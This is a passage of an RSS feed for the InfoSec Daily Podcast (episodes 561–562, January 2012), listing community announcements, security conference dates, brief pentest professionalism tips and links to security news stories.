	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span>http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span>CampusCon 2012</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span>http://campuscon.hackingwit.com</span></a><br />
	<span>(from Baconzombie)</span></p>
<p>
	<span>New England InfoSec Tweetup</span><br />
	<span>When: January 21, 2012</span><br />
	<span>Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span>http://neistu3.eventbrite.com/</span></a></p>
<p>	<span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span>When: Starts January 24, 2012</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>Schmoocon Epilogue</span><br />
	<span>When: After Schmoocon</span><br />
	<span>Where: Washington, DC</span><br />
	<span>Hit up anyone in NOVA Hackers</span></p>
<p>	<span>Metasploit Framework Unleashed Cincinnati</span><br />
	<span>When: February 11, 2012. </span><br />
	<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
	<span>$20 donation for #HFC</span></p>
<p>	<span>Social Engineering Training</span><br />
	<span>When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span>When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span>InfoSec Southwest</span><br />
	<span>When: March 31-April 1</span><br />
	<span>CFP Closes: Feb 1st</span><br />
	<span>Where: Austin, Texas</span><br />
	<a href="http://infosecsouthwest.com/"><span>http://infosecsouthwest.com/</span></a><br />
	<span>Peiter &ldquo;Mudge&rdquo; Zatko is the Keynote</span></p>
<p>	<span>Linuxfest Northwest 2012</span><br />
	<span>When: Saturday, April 28th-29th, 2012</span><br />
	<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>AIDE 2012</span><br />
	<span>When: May 21-25, 2012</span><br />
	<span>Where: Marshall University Forensic Science Center</span><br />
	<span>Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
	<span>CFP now open!</span></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: &nbsp;</span><span>What are the InfoSec Daily Podcast members New Years Resolutions?</span></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/"><span>http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/</span></a></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-detection.ars"><span>http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-detection.ars</span></a></b></p>
<p>	<b><br />
	<span>Pentest Lessons:</span><br />
	<span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span>https://twitter.com/pentestlessons</span></a><span>.</span><br />
	<span>Lesson 1:</span><span> Know not only how to use the tool, but what the tool can/cannot do.</span><br />
	<span>Lesson 2:</span><span> ALWAYS read the Statement of Work (SOW) before you show-up on-site. &nbsp;</span><br />
	<span>Lesson 3: </span><span>Write down what you&#039;ve found, include the </span><span>how </span><span>and </span><span>when</span><span>* </span><br />
	<span>Lesson 4: </span><span>When you run an exploit, don&rsquo;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&rsquo;re attacking. (deploying an &ldquo;agent&rdquo; means you`ve exploited the machine)</span><br />
	<span>* Very Important </span></p>
<p>	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter"><span>http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter</span></a></b></p>
<p>	<b><br />
	</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.infosecurity-magazine.com/view/23046/pastebin-shut-down-twice-in-a-week-by-ddos-attacks/"><span>http://www.infosecurity-magazine.com/view/23046/pastebin-shut-down-twice-in-a-week-by-ddos-attacks/</span></a></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-562-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3346/0/infosec-daily-podcast-episode-562.mp3" length="17334683" type="audio/mpeg" />
		<itunes:duration>0:36:07</itunes:duration>
		<itunes:subtitle>&#160;
Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez.
	Guests: Hackett, brew_ninja, oncee, and spridel.
	
Announcements:
	Information Sec[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 562 &#8211; Weekend Wrap-up with Dr. b0n3z
	InfoSec Daily Podcast Episode 562 for January 7, 2012. &#160;Tonight&#039;s podcast is hosted by Dr bonez.
	Guests: Hackett, brew_ninja, oncee, and spridel.
	
Announcements:
	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	NOVA Hackers Open House
	When: January 9th, 2012 at 6:00PM
	Where: ICF International, 9300 Lee Highway, Fairfax, VA
	http://maps.google.com/maps/ms?hl=en&#38;gl=us&#38;ptab=2&#38;ie=UTF8&#38;oe=UTF8&#38;msa=0&#38;msid=104405866946229741710.00048046ec622944cab00&#38;ll=38.871786,-77.265805&#38;spn=0.003968,0.006614&#38;t=h&#38;z=18
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)

	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 31-April 1
	CFP Closes: Feb 1st
	Where: Austin, Texas
	http://infosecsouthwest.com/
	Peiter &#8220;Mudge&#8221; Zatko is the Keynote
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: Marshall University Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	
Stories
Source: &#160;What are the InfoSec Daily Podcast members New Years Resolutions?
	
	
Source: http://www.cyberwarnews.info/2012/01/06/one-of-the-sony-hackers-s3rver_exe-has-been-hacked/
	
	
Source: http://arstechnica.com/business/news/2012/01/new-slow-motion-dos-attack-just-a-few-pcs-little-fear-of-det[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 561 &#8211; Saved by the Virus, Slurping Worm, Anatomy of a Skimmer Scam, Facebook, CISADA &amp; Symantec</title>
		<link>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec</link>
		<comments>http://www.isdpodcast.com/episode-561-saved-by-the-virus-slurping-worm-anatomy-of-a-skimmer-scam-facebook-cisada-symantec#comments</comments>
		<pubDate>Sat, 07 Jan 2012 02:20:43 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3341</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 561 for January 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 561 for January 6, 2012. &nbsp;</span><span style="font-size:13px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.</span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NOVA Hackers Open House</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 9th, 2012 at 6:00PM</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ICF International, 9300 Lee Highway, Fairfax, VA</span><br />
	<a href="http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://maps.google.com/maps/ms?hl=en&amp;gl=us&amp;ptab=2&amp;ie=UTF8&amp;oe=UTF8&amp;msa=0&amp;msid=104405866946229741710.00048046ec622944cab00&amp;ll=38.871786,-77.265805&amp;spn=0.003968,0.006614&amp;t=h&amp;z=18</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3327502/murder-retrial-ordered-after-court-records-destroyed-by-virus/</span></a></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A convicted murderer has been granted a retrial after a stenographer&rsquo;s backup record of his trial was apparently destroyed by a malware infection.</span></p>
